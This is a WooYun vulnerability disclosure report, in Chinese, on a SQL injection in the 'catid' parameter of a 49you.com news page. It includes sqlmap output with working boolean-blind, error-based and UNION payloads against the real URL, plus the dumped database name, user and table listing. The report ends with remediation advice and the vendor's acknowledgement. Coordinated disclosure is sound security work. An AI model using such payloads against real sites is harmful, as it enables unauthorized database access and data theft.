当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122803

漏洞标题:49you某业务SQL注射漏洞

相关厂商:49you.com

漏洞作者: xyang

提交时间:2015-06-26 09:33

修复时间:2015-08-13 10:04

公开时间:2015-08-13 10:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-26: 细节已通知厂商并且等待厂商处理中
2015-06-29: 厂商已经确认,细节仅向厂商公开
2015-07-09: 细节向核心白帽子及相关领域专家公开
2015-07-19: 细节向普通白帽子公开
2015-07-29: 细节向实习白帽子公开
2015-08-13: 细节向公众公开

简要描述:

厂商说真心的,我也是真心帮厂商的:)

详细说明:

问题地址:

http://i.49you.com/news/item/catid/55/id/15.html


问题参数:catid
加单引号报错

811F170B-EF2E-4DB8-9C5D-731F3B2376CC.png


URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 34 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://i.49you.com:80/news/item/catid/55 AND 3684=3684/id/15.html
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://i.49you.com:80/news/item/catid/55 AND (SELECT 4621 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT (ELT(4621=4621,1))),0x716a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)/id/15.html
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: http://i.49you.com:80/news/item/catid/55 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706b6a71,0x6b4a4c4e7a5864654f71,0x716a6b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- /id/15.html
---
[23:37:16] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL 5.0


current database: 'i_49you'
current user: 'i_49you@%'


跑跑数据

admin.png


Database: i_49you
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| linkage           | 3284    |
| log               | 2243    |
| menu              | 331     |
| model_field       | 211     |
| attachment        | 148     |
| attachment_index  | 106     |
| category_priv     | 103     |
| keyword_data      | 65      |
| admin_role_priv   | 61      |
| keyword           | 49      |
| cache             | 40      |
| hits              | 34      |
| search            | 34      |
| `module`          | 26      |
| category          | 19      |
| poster            | 17      |
| type              | 16      |
| news              | 11      |
| news_data         | 11      |
| model             | 10      |
| link              | 8       |
| urlrule           | 8       |
| member_group      | 7       |
| poster_space      | 6       |
| test_artice_data  | 6       |
| game              | 5       |
| game_data         | 5       |
| page              | 5       |
| sso_settings      | 5       |
| test_artice       | 5       |
| workflow          | 4       |
| admin             | 3       |
| member_menu       | 3       |
| site              | 3       |
| admin_role        | 2       |
| test_picture      | 2       |
| test_picture_data | 2       |
| `session`         | 1       |
| sso_admin         | 1       |
| sso_applications  | 1       |
| wap               | 1       |
+-------------------+---------+

漏洞证明:

如上

修复方案:

1、过滤参数catid
2、屏蔽网站报错信息
我不知道值多少钱,交给厂商

版权声明:转载请注明来源 xyang@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-06-29 10:02

厂商回复:

非常感谢白帽子童鞋 @xyang ,技术正常紧急修复中

最新状态:

暂无